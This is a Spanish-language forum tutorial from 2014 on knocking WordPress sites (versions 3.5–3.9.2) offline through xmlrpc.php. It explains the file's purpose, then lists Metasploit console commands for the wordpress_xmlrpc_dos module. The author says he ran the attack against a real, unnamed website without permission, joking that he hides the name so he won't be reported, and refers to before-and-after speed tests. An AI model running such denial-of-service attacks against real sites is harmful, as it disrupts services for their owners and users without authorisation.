DoS en Wordpress con xmlrpc.php

Iniciado por ZanGetsu, Septiembre 09, 2014, 03:26:33 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Septiembre 09, 2014, 03:26:33 PM Ultima modificación: Junio 07, 2015, 07:46:44 PM por EPSILON
Que hay chicos les traigo este peque tuto

xmlrpc.php para que sirve?

Xmlrpc.php es el encargado de permitirnos postear remotamente a través de Microsoft Word, Textmate, Thunderbird, smartphones, entre otros clientes. Todo ello a través del protocolo XML-RPC.


Además será quien se encargue de recibir los pingbacks (enlaces de otros blogs hacía alguno de nuestros artículos) y enviar los trackbacks (enlaces de nuestro blog hacía artículos de otro blog).

Bueno ya la vulne de xmlrpc me la tope hace mucho tiempo (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
este archivo se usa para realizar un poderoso ataque Dos, en donde el amigo metasploit ya hizo su trabajo :D

Código: php

msf > use auxiliary/dos/http/wordpress_xmlrpc_dos     
msf auxiliary(wordpress_xmlrpc_dos) > show actions           
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION <action-name>     
msf auxiliary(wordpress_xmlrpc_dos) > show options           
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run


Yo busque un website con wp versiones vulnerables: 3.5 - 3.9.2



No muestro el website para demostrar algo de etica (na mentira para que no denuncien jajaj)

Despues de completar el rhost y targeturi le damos a run



y con esto estaremos empezando el dos, el website cae a ratos, pero veamos un test
de velocidad de carga antes y despues:

Antes:



Con el dos activo:





Saludos !